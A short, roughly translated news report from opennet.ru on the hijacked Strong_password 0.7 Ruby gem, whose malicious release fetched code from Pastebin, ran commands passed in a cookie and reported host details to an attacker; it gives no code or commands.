Π June 25 release of the Strong_password 0.7 gem malicious change () that loads and executes external code hosted on the Pastebin service under the control of an unknown attacker. The total number of downloads of the project is 247 thousand, and version 0.6 is about 38 thousand. The number of downloads for the malicious version is 537, but it's not clear how true this is, given that this release has already been removed from Ruby Gems.
The Strong_password library provides a means to check the strength of the password that the user sets during registration.
using the Strong_password packages think_feel_do_engine (65k downloads), think_feel_do_dashboard (15k downloads) and
superhosting (1.5 thousand). It is noted that the malicious change was added by an unknown person who took control of the repository from the author.
The malicious code was only added to RubyGems.org, the project was not affected. The problem was identified after one of the developers using Strong_password in their projects began to figure out why the last change was added to the repository more than 6 months ago, but a new release appeared on RubyGems, published on behalf of a new maintainer, about which no one had heard about before heard nothing.
The attacker could have arranged arbitrary code execution on servers using the problematic version of Strong_password. When a problem with Pastebin was discovered, a script was loaded to organize the launch of any code transmitted by the client through the "__id" Cookie and encoded using the Base64 method. The malicious code also sent the parameters of the host on which the malicious Strong_password variant is installed to a server controlled by the attacker.
Source: opennet.ru